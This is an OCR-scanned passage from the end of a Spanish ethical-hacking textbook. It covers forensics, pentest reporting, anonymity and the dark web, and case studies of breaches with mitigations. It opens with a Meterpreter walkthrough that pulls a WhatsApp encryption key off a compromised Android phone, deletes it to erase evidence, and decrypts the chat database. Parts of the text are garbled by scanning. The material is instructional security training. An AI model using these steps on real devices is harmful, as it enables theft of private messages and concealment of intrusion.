a un directorio público con el comando ep, en este caso lo copie al directorio de 
WhatsApp. 
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cp key /sdcard/WhatsApp/ 


Ya no necesitamos shell, ingresemos a meterpreter cerrando la shell con 
control + z. 
EC 
Terminate channel 13? [y/N] y 


Ahora, nos iremos al directorio donde está la llave, y la descargamos con el 
comando download, y posteriormente eliminaremos la llave para borrar evidencia 
con el comando rm. 


meterpreter > pwd 
/storage/emulated/legacy/WhatsApp 
meterpreter > ls 

Listing: /storage/emulated/legacy/WhatsApp 


Type modifi Name 
4896 dir 2018-07-29 :46: . Shared 
4096 dir 2018-10-16 :04:4 . trash 
4 4096 dir 2018-10-16 :00: Databases 
y- 4096 dir 2018-02-10 zT: Media 
100666/rw-rw-rw- 158 fil 2018-10-16 238% key 


meterpreter > download key 

Downloading: key -> key 

Downloaded 158.00 B of 158.00 B (100. 
:*] download : key -> key 
meterpreter > rm key 





Ahora sí, ya tenemos tanto la base de datos, como la llave para desencriptarla, 
ahora vamos a desencriptarla, para esto existen varias opciones decentemente sencillas. 


La primera, si es una base de datos pequeña, es http://whatcrypt.com , 
directamente en la página, y si es una base de datos más grande, descarga la app en 
tu Android, sube los dos archivos en tu Android, y simplemente sube la base de datos 
y la llave al directorio. 


Decrypt WhatsApp Database 
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1.db.cryptt2 


Key File Path (Crypt 6>12): 


/sdcard/WhatsApp/key 


Decrypt Database 3 


Otra alternativa que encuentro más cómoda es usar WhatsApp Viewer, que 
puedes encontrar en https: //whitesuithacking.com/material-libro o en su repositorio 
en GitHub buscándolo con dicho nombre. 





Posteriormente, sea la herramienta que sea que uses, obtendrás un archivo 
«db, eso significa que ya podrás visualizar la base de datos en cualquier visualizador 
compatible, recomiendo WhatsApp Viewer de nuevo, ya que lo ordena en una 
interfaz amigable, sin embargo, existen otros programas que podrían manejar estos 
archivos. 


Para abrir el archivo, simplemente haz clic en “File”, “Open... ”, y selecciona 
la base de datos. 
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Y ahora te mostrará los contenidos en una manera organizada y amigable. 











FORENSE 


Aunque este libro no es uno enfocado en informatica forense, pienso que 
vale la pena hablar un poco al respecto tan solo para entender la metodologia y la 
importancia de esta para la continuidad de un negocio, asi que tocare el tema de 
informática forense, su metodología, y una práctica con una herramienta para esto. 


6.1 METODOLOGÍA 


La metodología de la informática forense tiene que ser llevada muy 
estructurada, pero en sí, es decentemente sencilla, lo importante aquí es que para 
recopilar evidencias confiables y admisibles legalmente hablando, se tiene que llevar 
una cadena de custodia muy estructurada de por donde paso la información, como 
se obtuvo, que cambios se hicieron, quien tuvo acceso a esta, y donde se almacenó. 


Tomando en cuenta lo anterior, los pasos son: 


1. Identificar la evidencia: En este paso se llega a la “escena” y se identifica 
que es evidencia y que no lo es. 


2. Adquisición de la evidencia: En este punto, un equipo de informática 
forense empezaría a tomar la evidencia, dígase fotos del sistema, como 
está actualmente, transportar los dispositivos, nota, en este paso es muy 
importante que ninguna evidencia sea contaminada o modificada, por 
ejemplo, si se encuentra un sistema prendido y conectado, se buscaría en 
ese momento tomar la evidencia digital, por ejemplo, registros, copias 
de disco, etc, sin que se apague o haga cualquier cambio importante a la 
máquina. Incluso se tiene que documentar que herramienta se utilizó para 
recopilar la información ya que toda herramienta deja su propia “huella”. 


278 EL LIBRO BLANCO DEL HACKER. 2° EDICIÓN ACTUALIZADA O RA-MA 


3. Preservación de la evidencia: Típicamente se sacan copias dobles de 
los discos e imágenes que se obtengan de una información o evidencia 
sensible. 


4. Análisis de la evidencia: En este punto es donde se obtiene información 
real de la evidencia, como que se hizo a qué tiempo, quien modificó algún 
sistema, de donde, etc., todo tiene que ser estrictamente documentado, 
tanto de cómo se obtuvo, como exactamente que muestra. 


5. Presentación del informe: Aquí es reportar todo lo obtenido y la 
metodología que se llevó, así como un registro (la cadena de custodia) 
que muestre quien tuvo acceso y que se modifica de la información. Aquí 
el trabajo del forense NO es sacar conclusiones de porqué se hizo algo, o 
ni siquiera quien, solo los hechos deben de ser presentados. 





identificación MR ME Preservación 
dela . : de la 
evidencia | yi evidencia 


Análisis de la Presentación 
evidencia i delink 








Para esta practica, utilizaremos DAWF, una herramienta forense para 
Windows bastante sencilla, esta no esta disefiada para actividades en las que la 
evidencia tenga que ser utilizada por la policia, sin embargo, es una herramienta util 
y sencilla de utilizar para obtener cierta información como registros de un sistema. 


Adicionalmente, cabe mencionar que DAWF realmente no hace nada 
más que automatizar ciertos procesos para recopilar información, así que es una 
herramienta muy básica. 
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Para descargarla, entren a https://whitesuithacking.com/material-libro y 
hagan clic en el botón que dice DAWF, luego de eso, descomprime el archivo .zip, y 
obtendrás una carpeta similar a la siguiente. 


Mo antivirus detectan E herramienta como maliciosa. esto es por la. atur leza de 


la herramienta, no está hecha para ataques y evasión de antivirus, si 
noes. 











Evidencias Herramientas l COMCTL32.0CX | DAW F.exe 


En esta carpeta, la herramienta DAWF, que es la que automatiza las funciones, 
es el ejecutable, y la carpeta de herramientas son las herramientas reales que DAWF 
esta utilizando para automatizar, en la carpeta de “evidencias” es donde se guardaran 
nuestros resultados. 


Para iniciar la herramienta, ejecuta DAWF como administrador, y vamos 
a ponerle “Iniciar”, y esperemos un poco a que haya terminado de recopilar la 
informacion. 


Iniciar DAWF 





Al terminar el proceso, aparecerá una ventana avisando de ello, asi como 
donde guardo lo encontrado. 
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DAWF ha Finalizado y se 





Revisa los archivos generados en la siguiente ruta C:\Users\WhiteSuit 
Hacking Downloads DAWF Evidencia WIN- KA6NAUTILSB-194732-mu 





Ahora, dentro de la carpeta “evidencias”, entraremos a la carpeta nueva que 
creo DAWF, en donde veras algo parecido a esto. 


e 











Actividad-Equipo  InformacionBase Informacion-Nav  Integridad-de-Ar Mensajeria-y-Soc Passwords  Informe-WIN-KA 
Sistema egadores chivos ial 6NAUTILSB 


Aqui dentro de las categorías podremos ver información de registros y uso 
de la máquina, no tiene sentido ir por cada uno de los archivos que genera DAWE, 
pero el uso es el mismo, entra a la carpeta de la categoría, digamos que queremos ver 
lo que se ha hecho en la máquina, entraremos a la primera carpeta. 





Ahora abriremos como ejemplo, el archivo de “ExecutedProgramList”, que 
nos dirá todos los programas que han sido ejecutados en la máquina, todos estos 
archivos están en HTML, así que podemos abrirlos con cualquier navegador. 


Dentro del archivo verás en una tabla los programas que han sido ejecutados, 
fechas, usuarios, y ubicaciones, y en los demás archivos hay otro tipo de información 
que podría ayudarte desde a detectar mal uso del sistema, hasta maneras en las que 
hubo una intrusión. 


Executed Programs List 































































































INFORME 


El trabajar como hacker profesional requiere muchas habilidades técnicas, 
de resolución de problemas, entre otras cosas, pero una de las cosas que a casi ningún 
hacker profesional nos gusta, es la parte final de cualquier trabajo, el informe. 


Tenemos que recordar que aunque un servicio de ciberseguridad es 
altamente valioso, no producimos ni creamos nada realmente, solo auditamos, 
entonces nuestro entregable y prueba de trabajo para nuestros clientes, es el cómo 
reportamos el trabajo que hemos realizado, así como la metodología que utilizamos 
que es una de las habilidades más importantes que un profesional de ciberseguridad 
debe tener, además, es un hecho que a pesar que hay cientos de libros de pentesting 
y ataques, cientos de miles de horas de entrenamiento para esto, y varios centros 
de capacitación, podría apostar que menos del 10% del material está dedicado a la 
etapa del informe. 


Tanto este libro, como nuestras capacitaciones, están diseñadas no solo para 
entrenarte como hacker, si no para que puedas utilizar tus conocimientos en un uso 
profesional así que esta es una etapa que no debes ignorar. 


7.1 METODOLOGÍA 


A pesar de que hay varias menciones de metodologías para reportar, no 
hay tal cosa como una sola centralizada y única para reportar, podemos decir que 
generalmente hablando todos los hackers profesionales seguimos la metodología 
de prueba de penetración, pero el tema de informe es relativamente subjetivo, sin 
embargo, hay algunos puntos que deben ser adecuadamente explicados al cliente. 
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En la mayoria de las consultorias, se entregan dos informes en una prueba 
de penetración o auditoría, el primero, llamado el informe ejecutivo, está diseñado 
para un director o ejecutivo de la empresa, no un experto en seguridad, y el segundo, 
llamado el informe técnico, es para el jefe o experto en seguridad o sistemas, y 
menciona todos los detalles técnicos de la metodología y las recomendaciones 
técnicas de cómo mejorar el nivel de ciberseguridad. 


7.1.1 Informe Ejecutivo 


El informe ejecutivo, como mencionaba, no es para el experto en seguridad, 
es para el ejecutivo o director de empresa que no tiene conocimientos o interés en 
los detalles técnicos del estado de seguridad de su organización, a esta persona le 
interesa conocer el estado general de la situación, y el cómo y en cuanto tiempo se va 
a remediar los problemas, recuerda, a pesar de que la profesión de ciberseguridad es 
una profesión técnica, la razón por la que existe es para proteger los activos tangibles 
e intangibles, (es decir, dinero) de una organización, así que a los tomadores de 
decisiones debes de traducir la inversión que se le hizo para mejorar su seguridad 
en cosas tangibles, como “si hubiera pasado esto, hubieras perdido x cantidad de 
dinero”, o “si x ataque sucediera, se detendrá la operación de la empresa x tiempo”. 


Tomando esto en cuenta, lo principal que sugiero incluido en un informe 
ejecutivo es lo siguiente, toma en cuenta que esto generalmente se presenta más en 
gráficas y tablas que en detalles técnicos: 


1. El contexto: Esto se refiere a el objetivo de la auditoria, activos que se 
auditaron, tiempo, etc. 


2. Resultados/conclusiones: En esta sección se debe de hablar de la 
efectividad del pentester en llegar a los objetivos que se establecieron, en 
términos generales, se comprometió algún sistema, o ninguno, o algunos 
en cierta medida, etc. 


3. Ranking de riesgo: Aunque un análisis de riesgo completo es otro tema 
completamente diferente, es recomendable dar un valor numérico del 
nivel de riesgo que presenta la organización, es relativamente subjetivo, 
pero esto es tomando en cuenta si las vulnerabilidades encontradas 
son críticas o no, y si están en un sistema importante o no, una forma 
de hacer esto es catalogar el nivel de riesgo organizacional general, y 
por áreas, por ejemplo, esto se puede dividir por departamentos o por 
activos (digamos, si sus sistemas son seguros, pero su personal está 
mal entrenado, entonces tienen bajo riesgo en el sistema pero alto en el 
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personal, entonces la mitigación debe de enfocarse a entrenamiento más 
que inversión en infraestructura). 





information Security Risk Rating Scale 


+ Extreme risk of security controls being compromised with 
the possibility of catastrophic financial losses occurringas | 
arest o z 


+ High risk of security controis being compromised with the _ 
potential for significant financial losses occurring asa 
result : : 


* Elevated risk of security controls being compromised with 
Elevated the potential for material financial losses occurringasa 
7-9 result : : = 


* Moderate risk of security controls being compromised with 
the possibility of limited financial losses occurring asa 
result 


* Low risk of security controls being compromised with a : 
measurable negative impacts asaresult 





4. Encuentros generales: Aqui es un resumen de lo que se encontró o los 
errores principales, por ejemplo, si la mayoría de los errores fueron a 
base de falta de entrenamiento, o falta de actualización, o de la red, etc, 
generalmente esto se presenta en una tabla o gráfica. 


Security Risk Origin/Category 


@ Missing Patch 


m Lack of Application 
Hardening 


x Lack of OS Hardening 


@ Easily guessable 
credentials 


@ Network Design Haw 





5. Resumen de recomendaciones: En este apartado se menciona las 
recomendaciones como experto para elevar el nivel de seguridad, que 
cosas son prioridad, que cosas no, y como se podria resolver, recuerda, el 
trabajo del pentester no es asegurar, ese es un trabajo adicional. 
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6. Plan de acción: Esto es relativo a la organización, pero un plan de acción 
pone acciones en concreto que recomiendes como experto para que se 
eleve el nivel de seguridad empresarial, y plazos específicos en los que 
debería de cumplirse ciertas metas. 

















Create Remediation Strategy 
+ Leversgeresults found within the Penetafon Test tocrestes ful remediation strategy 


* This sssessmentreport will provide the basis for this action. It must now be formalized and approved by the 
CLIENT Security Team. 


Create information Security Council Task Force : 
»  Togsin bettertraction in theremediation and security onboarding process, CLIENT should crestes specific ISEC i 
council to aid in semedistion and adequately involve esch individual team. : 

< Thecounci# should consst of Management ofesch indvidusl businessunit 





| Begin Security Projectpianning +5 i 
® Assign Executive owners of security for CLIENT 





Prior itize ze Remediation Events > i 
æ Leversgeresults found within Penetration Test to gain understanding of the tasks needed tobe performed in order i 





s Assign priority listing to remediation tasks thatwill provide the highest level of impact and largest reductionof 
identified risk. 








Harden Servers 
. 








7.1.2 Informe Técnico 


Esta sección no va dirigida a los ejecutivos, si no a los programadores, o 
ingenieros de sistemas, aquí es donde deberás ser tan detallado y técnico como sea 
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posible, lo importante aquí es la narrativa del ataque, que es donde redactas la 
metodología, con capturas de pantalla y detalles de las herramientas y comandos 
utilizados, como obtuviste acceso a los recursos de la organización, para esto vas a 
redactar la metodología que has aprendido a lo largo de este libro. 


Partes de un informe técnico: 


1. 


Introducción: En la sección de introducción deberás reportar el inventario 
inicial del ataque, que puede ser cosas como el personal involucrado, la 
información de contacto, el alcance de activos involucrados, el objetivo, 
y la estrategia. 


. Reconocimiento: deberás documentar todas las técnicas de 


reconocimiento, herramientas, y comandos que hayas utilizado para 
obtener información para realizar el ataque. 


. Análisis de vulnerabilidades: Documentar todo lo que se utilizó y lo 


que se obtuvo en esta fase del pentest. 


. Explotación: Documentar todo lo que se utilizó y lo que se obtuvo en 


esta fase del pentest. 


. Post- Explotación: Documentar todo lo que se utilizó y lo que se obtuvo 


en esta fase del pentest. 


. Riesgo: En este punto la meta es darle al cliente la habilidad de identificar, 


visualizar y mitigar las vulnerabilidades encontradas, así que aquí deberás 
cubrir los incidentes en los que fueron comprometidos los recursos, que 
tan probable es que sucedan, el grado de magnitud que representa, y las 
pérdidas posibles que ocasiona un ataque real si el riesgo no es mitigado. 


. Conclusión: Finalmente, un resumen del pentest, plan de acción y 


recomendaciones para mejorar el nivel de seguridad de la organización. 


Estas son las bases para realizar informes profesionales, aun sugiero que 
visites la página de pentest-standard para leer un poco al respecto http://www. 
pentest-standard.org/index.php/Reporting así como ver los ejemplos de informes 
que subi en https://whitesuithacking.com/material-libro. 


ANONIMATO, DARK WEB Y DEEP WEB 


Estos temas se han vuelto de mas interés últimamente, pero realmente poca 
gente entiende cómo funciona y que es la Deep web y Dark web, adicionalmente, 
cada vez más gente es consciente de su privacidad debido al constante espionaje a 
nosotros que existe de parte del gobierno y las grandes corporaciones, así que en este 
capítulo hablemos algo del tema, a este punto ya no es necesario utilizar Kali Linux, 
y todo esto es compatible con Windows, Macintosh y Linux. 


8.1 ANONIMATO 


Antes de poder tener anonimato en la red, tenemos que entender cómo es 
que nos rastrean en la red y obtienen información nuestra, la forma en la que somos 
rastreados principalmente involucra a los siguientes factores: 


1. Dirección IP y routers: Este es el primer factor que se utiliza para 
rastrear a una persona, ya que fácilmente con la IP podemos obtener la 
ubicación aproximada de una persona, su proveedor de internet, y por ese 
medio podríamos hacer escaneos que nos den más información, ya que 
nos podría permitir una comunicación con el router. 


Adicionalmente, algo poco conocido pero real, es el hecho que a pesar que 
para un atacante la IP le da información de una ubicación aproximada, 
compañías como Apple y Google saben exactamente tu ubicación, 
debido a que los sistemas operativos de los móviles, al conectarse a un 
nuevo router, secretamente le mandan información de ubicación GPS a 
la compañía dueña del sistema (¡OS-Apple, Android-Google), por lo que 
actualmente son de las compañías que potencialmente más información 
tienen de todos nosotros, Google tiene un formulario para solicitar que se 
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borre o no se grabe mas información de este tipo, sin embargo, Apple al 
momento que estoy escribiendo esto, no tiene tal herramienta. 


2. Cookies: Este es el factor por el cual compañías como Facebook, Google 
y Amazon “mágicamente” saben en qué productos estamos interesados, 
que paginas visitamos, y mucha más información nuestra, esto es gracias 
a las sesiones que guardan las “cookies” de los navegadores, que permiten 
rastrearte incluso cuando sales de las páginas de estas compañías. Por 
esta razón, Google sabe que estás haciendo incluso si no estás en una 
página de Google, igual que Facebook, Amazon y Microsoft. 


3. Redes: Un atacante, como ya hemos mencionado en el libro, podría saber 
lo que estás haciendo si intercepta información que mandas dentro de una 
red privada, es cierto que con encriptación punta a punta difícilmente van 
a poder espiar la información que mandas por ese canal, sin embargo, hay 
otra clase de información no encriptada que mandas, como tus peticiones 
DNS (que dicen a qué página estas entrando), tu dirección MAC (que dice 
el nombre de tu fabricante), y potencialmente los servicios que utilizas. 


4. Otros: Existen otros factores que pueden ayudar a una compañía u 
atacante a rastrarte, por ejemplo tu hardware (dirección MAC), tu sistema 
operativo, tu navegador, tu historial, tus búsquedas en Google u hábitos 
de navegación (por ejemplo las aerolíneas las utilizan para segmentar 
precios). 


Y si te pones más estricto, hasta las antena telefónicas y las cámaras 
de seguridad en la calle pueden ser utilizadas para rastrear personas, sin 
embargo probablemente no tienes que preocuparte de esto mientras no 
seas buscado por una instancia gubernamental o militar. 


Ahora que entiendes algunas de las cosas que utilizan para rastrearte, veamos 
cómo protegerte, a primera instancia puede sonar un poco complicado bloquear 
todos esos factores, sin embargo, en realidad no es muy complicado. 


Empecemos por lo más básico, un VPN, un VPN bueno va a hacer dos cosas 
muy importantes, primero, va a encriptar el canal de comunicación, de forma que 
a pesar que estas conectado por tu router normal, todo el tráfico va a pasar por un 
“túnel” encriptado directamente al servidor VPN, y desde este servidor VPN vas a 
acceder al internet, esto encripta tu canal de comunicación de forma que si algún 
atacante intercepta las redes en tu LAN, no va a poder ver absolutamente nada, 
adicionalmente, va a esconder tu proveedor de internet (ISP), tu información de este, 
y tu IP, haciendo difícil que alguien te rastree por tu IP o por tu red o ISP. 


© RA-MA Capítulo 8. ANONIMATO, DARK WEB Y DEEP WEB 289 


Hay una debilidad, sin embargo, deberías de investigar la VPN que utilices, 
ya que esta VPN si tendrá acceso a toda la información que normalmente tu ISP 
y Router verían, y si la compañía elige, podría utilizar tu información de forma 
indebida, o compartirla con gobiernos, empresas o ISPs para rastreo, así que vale 
la pena investigar a los dueños de una empresa VPN, y sus políticas de privacidad, 
por ejemplo, cuando TunnelBear(una empresa de origen Canadiense) fue comprada 
por Mcafee, una empresa americana, algunos usuarios dejaron de utilizar el servicio 
debido a que al tener que acatar las leyes americanas con la compra, potencialmente 
tendrían que darle al gobierno americano datos de sus usuarios. 


= 






VPN Server 
Encrypted VPN “Tunnel” 


Normal Connection cy 
{No VPN) 


£ The Internet 


= 


Ahora, una VPN ciertamente ayudara mucho a tu privacidad, sin embargo, 
si realizas busquedas, incluso con navegadores “incognitos” como el de Chrome, 
vas a ser rastreado por medio de las sesiones, así que una solución sencilla es en 
las búsquedas utilizar buscadores como DuckDuckGo, que asegura no rastrar a sus 
usuarios, y no dar búsquedas ni publicidad personalizadas por lo mismo. 


Sin embargo, si quieres ser realmente anónimo en la red usando tú mismo 
sistema operativo, una de tus mejores opciones es utilizar TOR, un navegador que 
puedes instalar entrando en la página https://www.torproject.org/. Este navegador 
tiene algunas características especiales, la primera, es que, utilizando la tecnología 
de TOR, te conecta al internet por medio de proxychains, lo cual esencialmente te 
conecta al internet a través de otro sistema, que está conectado a otro sistema, de forma 
que se vuelve difícil para una organización u atacante, rastrearte, adicionalmente, 
TOR por defecto no guarda cookies, y el buscador por defecto es DuckDuckGo, así 
que es el navegador perfecto para anonimato. 


Sin embargo, en TOR hay una diferencia entre anonimato y privacidad, ya 
que a pesar de que la tecnología TOR hace un buen trabajo escondiendo quién eres 
y donde estas, no esconde lo que estás haciendo, es decir, no encripta la información 
como un VPN. 
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Otra funcionalidad de TOR, es que permite acceso a los sitios .onion, que 
son en donde se encuentran muchos de los sitios en la Deep/Dark Web. 





Ahora hablemos un poco de la Deep Web y la Dark Web, estos conceptos 
usualmente son causa de confusión y morbo, con leyendas sobre redes criminales e 
incluso conspiraciones dentro de estas redes, así que empecemos por entender que 
son estos conceptos, y cuál es la diferencia entre estos. 


8.2.1 Deep Web 


Empecemos por la Deep Web, esta es una clasificación que se refiere a todo 
lo que no pueda ser encontrado por un motor de búsqueda, y no necesariamente 
significa que es algo que sea explícitamente oculto o ilegal, simplemente es una 
limitación de la tecnología de un motor de búsqueda, un ejemplo sencillo es una 
base de datos dentro de una página web, por ejemplo algo como la base de datos 
de crímenes en Dakota del Norte, http://publicsearch.ndcourts.gov/default.aspx 
, Si intentas encontrar resultados dentro de esta base de datos por medio de un 
motor de búsqueda como Google, DuckDuckGo o Bing, no lo lograras, entonces 
por definición esta información pertenece a la “Deep Web”, adicionalmente, no 
necesitas nada en especial fuera de un navegador común para acceder a un sitio 
de la “Deep Web”, de seguro lo has hecho cientos de veces en información dentro 
de páginas no indexadas. 
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8.2.2 Dark Web 


La “Dark Web”, sin embargo, es algo completamente diferente, los sitios 
en la Dark Web son clasificados como los que son intencionalmente escondidos 
e inaccesibles a través de navegadores comunes. Los sitios de la Dark Web son 
creados para estar ocultos, dentro de aquí la privacidad es primordial, el contenido 
más conocido es el que se encuentra dentro de la red TOR, que puedes identificar 
por la terminación .onion de los sitios. 


Esta es la red que es causa de diversas leyendas, teorías de conspiración y 
grupos criminales, y a pesar de que esto último si es verdad, existiendo dentro de esta 
red redes criminales enormes que van desde asesinos a sueldo hasta tráfico de drogas 
y de personas, también existe para combatir la censura en países con gobiernos 
opresores, dando acceso a un canal de comunicación seguro y anónimo comúnmente 
utilizado por los medios de comunicación oprimidos. 





8.2.2.1 COMO ENTRAR 


Ahora que entiendes que es la Deep Web y la Dark Web, seguro te preguntaras 
en el caso de la Dark Web “y como entro a esta red?”, bueno, antes de decirte, 
tengo que mencionarte que es verdad que dentro de esta red existen redes enormes 
de criminales y contenido ilegal tal como la pornografía infantil, homicidios y 
tráfico de drogas, además de que existen comunidades de cibercriminales en esta 
red, así que se prudente al entrar a esta red, no por utilizar TOR significa que eres 
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100% irrastreable, ademas que existen entidades gubernamentales como el FBI que 
activamente buscan criminales en esta red. 


Ahora, para entrar, requerirás dos cosas: 


1. TOR El navegador TOR que mencione anteriormente, instálalo en tu 
sistema. 


2. Dirección Onion Una dirección URL .onion, ya que como mencionamos 
anteriormente, estas páginas no están indexadas en ningún buscador, 
por lo cual la única forma de entrar a una página de la Dark Web es 
directamente con la URL, o saltando de liga en liga. 


Ahora, una vez que hayas iniciado TOR, una sugerencia seria ir a lo que se 
considera el “inicio” de la Dark Web, por ser lo más conocido del tema, esta es una 
página que se llama The Hidden Wiki, para entrar aquí, basta con escribir la URL 
http://zqktlwi4fecvobri.onion/wiki/index.php/Main_Page en TOR, y les aparecerá 
una página que tiene un directorio de las páginas más conocidas de la Dark Web. 





Ahora, lo repito, existen ligas con contenido peligroso, criminal y 
actividades ilícitas, recomiendo no entrar, y ser prudente al entrar a páginas en 
esta red, así como en dar o solicitar información. 


En esta sección veremos algunos casos de la vida real en la que cibercriminales 
han atacado exitosamente a organizaciones, intenta determinar dos cosas mientras 
los lees: 


1. ¿Qué técnicas pudieron haber utilizado para realizar el ataque? 


2. ¿Si tu fueras el jefe de seguridad, qué harías para defender de ese tipo de 
ataques? 


Ahora, empecemos con los casos. 


Algunas cosas las estamos asumiendo, ya que no tenemos forma de saber a ciencia 
cierta si paso exactamente así, pero están basadas en evidencias reales. 


9.1 ROBO BANCARIO 


Empecemos por uno de los casos más interesantes, hace algunos años, se 
realizó un robo bancario por aproximadamente 18 millones de pesos mexicanos a 
un banco mexicano, en el que los culpables nunca fueron detenidos, lo siguiente lo 
estamos asumiendo en base al informe forense. 


Para empezar, tenemos que entender el fundamento de cómo funcionan los 
bancos, y, a grandes rasgos, existen tres partes de un banco. 
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Y La sucursal: Aqui es donde verifican la información de los clientes, su 
identidad, y reciben y entregan dinero de los clientes. 


Y El corporativo: Aqui es donde se autorizan las transferencias, creación 
de cuentas, envió de dinero, créditos, etc. 


Y El sistema: Aquí es donde realmente existe el dinero, ya que como todos 
sabemos, nuestro dinero en general no existe, son datos en sistemas. 





Ahora que entendemos esto, empecemos con el ataque. 


De alguna forma, ¿el grupo delictivo obtuvo acceso a la red interna del 
corporativo, como crees que pudo pasar esto? 


La teoría es que paso como pasa en la mayoría de los casos, utilizando 
ingeniería social para obtener acceso a un sistema a través de las personas poco 
entrenadas en ciberseguridad. 


A través de esta red, intentaron acceder el sistema, para “agregarse unos 
ceros de más”, sin embargo, esto fue imposible por el nivel de seguridad que se tenía 
en el sistema. 





Así que, los hackers decidieron ahora poner en su mira a las personas que 
trabajan dentro del corporativo, analizando su tráfico, y pivoteando dentro de la red. 
¿Con que herramientas o técnicas vistas en el libro podrías hacer esto? 
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Después de un tiempo, se dieron cuenta que los empleados del corporativo 
se enviaban entre ellos (en la red interna) archivos XML no encriptados, en los 
cuales había información de cuentas, transacciones y más información que era la que 
se usaba para hacer solicitudes al sistema. 


Con esto, los hackers decidieron lentamente crear una lista de los clientes 
más ricos del banco, posteriormente, filtraron archivos XML falsos en los cuales 
se solicitaba crear cuentas bancarias a nombre de ex convictos de forma que no se 
requiera la verificación usual de la sucursal. 


Luego de esto, simplemente filtraron más archivos XML con órdenes de 
transferencias bancarias, haciendo que los mismos empleados empezaran a realizar 
las solicitudes de transferencias, y finalmente, solo fue cuestión de mandar a los 
exconvictos a retirar dinero de las sucursales con su nombre. 


Así fue como el banco perdió 18 millones. Ahora, si tu fueras el CSO, ¿Qué 
harías para que esto no vuelva a pasar? 





9.1.1 Mitigación 
¿En este caso, cuáles fueron las causas de que el ataque fuera exitoso? 


Yo diría que fueron estas principalmente: 


Y Los empleados no estaban bien entrenados 
Y Se enviaban archivos XML sin encriptación 


Y No había una segunda verificación para autorizar movimientos, lo cual es 
una falla en la política de seguridad 


Una mitigación obvia seria auditar primero que nada los procesos para 
crear y autorizar movimientos en las cuentas, lo cual requiere cambiar la política de 
seguridad empresarial, la segunda, probablemente siendo la más importante, sería 
la capacitación de los empleados, lo más probable es que los hackers obtuvieron el 
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primer acceso por una falla humana a través de ingeniería social, y al final, el ataque 
fue hecho por las manos de los empleados, así que hubo una falla en capacitación. 





Hace algunos años, cierta empresa de investigación en México tuvo un robo 
en su propiedad intelectual (investigaciones). 


En esta empresa, los trabajadores y socios son de clase alta en la ciudad más 
rica del país, y por ello, combinado con un poco de arrogancia, evitan el contacto con 
gente de clase baja, por lo que una empresa externa administraba su área de RH para 
contrataciones de intendencia y mantenimiento. 


Un día, se contrató a un conserje, que a primera vista era una persona de tez 
y clase humilde, y por esto y lo mencionado anteriormente, fue asignado el horario 
nocturno de limpieza. 


Resulta, que esta persona era un espía industrial altamente capacitado, y al 
limpiar de noche, y notar que toda la investigación de los empleados estaba sobre 
los escritorios, simplemente saco su móvil y tomo fotos de todo, esto causo pérdidas 
millonarias debido al tipo de material que era (investigación). 





¿Qué cambios harías en la empresa para evitar este tipo de ataques? 
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9.2.1 Mitigación 

¿En este caso, cuáles fueron las causas de que el ataque fuera exitoso? 

Yo diría que fueron estas principalmente: 

1. Los empleados no estaban bien capacitados 

2. Tenían mal cadena de seguridad en su proceso de contratación 

3. No había una adecuada política de seguridad 

En este caso, lo primero que se hizo, fue establecer una política de “escritorio 
limpio”, esencialmente significa que al terminar el día el escritorio tiene que estar 


limpio, y lo segundo, fue revisar el proceso de investigación a la gente que contratan 
y a las subcontrataciones (como el de RH que subcontrataron). 





UBARRY (S.A FINE EXAMPLE OF THE Success. oF 
CUR CLEAR DESK ouc” 


9.3 FILTRACION DE CADENA DE COMIDA RAPIDA (ESPIONAJE INDUSTRIAL) 


Hace tiempo, una cadena de comida rápida que vende hamburguesas 
principalmente, llamémosla “K”, realizo una investigación de mercado extensa 
sobre estudiantes, que costo 9 meses y varios cientos de miles de pesos, pero 
finalmente llegaron a la conclusión que si vendían su hamburguesa a $X precio en 
cierto horario, venderían muchísimas hamburguesas a los universitarios, finalmente 
ganando mercado contra empresa “M”, entonces se tomó la decisión de sacar la 
promoción y se mandó comunicados a la imprenta para los flyers. 
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Sin embargo, un espía industrial que obtuvo la información gracias a la 
comunicación que se tuvo con la imprenta, le vendió la información a empresa M, 
la cual inmediatamente lanzo su promoción, ganándole en tiempo a empresa K, y, 
efectivamente, en ventas, empresa K también saco la promoción, pero al ser después, 
tuvo menos efecto del esperado, y empresa M gasto una fracción de recursos para 
obtener más beneficio. 


Esto fue debido a una falla en seguridad de la información, ¿qué harías tu 
para evitar esto? 


9.3.1 Mitigación 

¿En este caso, cuáles fueron las causas del problema? 

Yo diría que fueron estas principalmente: 

1. La cadena de comunicación no tenía privacidad 

2. Mala política de seguridad 

3. Mal tiempo de respuesta 

En este caso la principal causa es obvia, la mala cadena de comunicación y 
política de seguridad cliente-proveedor de las empresas, aquí vale la pena aprender de 
Apple, de cómo su cadena de producción, a pesar que está en china, exige investigar 
a cada empleado, y tienen prohibido llevar móviles a las fábricas, además de que 
no se le da a ningún área o empleado toda la información, de forma que nadie tiene 


la información completa, adicionalmente, el tiempo de respuesta fue un factor, que 
hizo que la competencia tuviera suficiente tiempo para robarles la estrategia. 


TL 
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CONCLUSION 


Asi concluye este libro, espero hayas aprendido bastante, y realizado 
las practicas, si deseas probar y aumentar tus conocimientos, en nuestra pagina 
whitesuithacking.com y  hackshop.whitesuithacking.com puedes encontrar 
exámenes de certificación, cursos y herramientas. 


También tenemos apoyo para este mismo libro en un curso en línea en 
academy.whitesuithacking.com. ¡Usa el cupón “exalumno” para obtener descuento 
especial! 


Como habrás notado a lo largo de este libro, lo más importante no fueron 
las técnicas, si no conocer la metodología y estándares para que puedas partir de 
ahí y aprender con una buena base, en los siguientes libros, tocaremos temas más 
especializados partiendo de aquí, como ataques todavía más peligrosos, temas como 
informática forense, defensa, pentesting a páginas web, entre otras cosas. 


Próximamente publicaremos nuevos libros de hacking y otros temas. 


Sin más que agregar, ¡HAPPY HACKING! 


El libro blanco del HACKER 


2? Edicion Actualizada 


De forma totalmente práctica, este libro te guiará, desde los cimientos hasta 
las técnicas más modernas que usa un Hacker profesional, para poder compro- 
meter la seguridad de un sistema. De esta forma descubrirás cómo puedes tú 
también convertirte en Hacker profesional. Una de las profesiones más deman- 
dadas del mundo. 


Este libro contiene las técnicas de seguridad ofensivas necesarias para que pue- 
das llegar a auditar (por medio de pruebas de penetración) y defender una 
organización en temas de ciberseguridad, basándote en metodologías y están- 
dares internacionales, tales como: PTES, OWASP, NIST, etc. 


Aprenderás de forma real y ágil los conceptos necesarios sobre ciberseguridad, 
además de todas las herramientas necesarias para que puedas poner en prác- 
tica todo lo visto. 


Adicionalmente, este libro está diseñado para que superes con éxito las certifi- 
caciones profesionales de hacking ético: como, por ejemplo, G.H.0.S.T. 


¡Diviértete convirtiéndote en el próximo Hacker profesional! 


AMIA 
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ar Ra-Ma” 





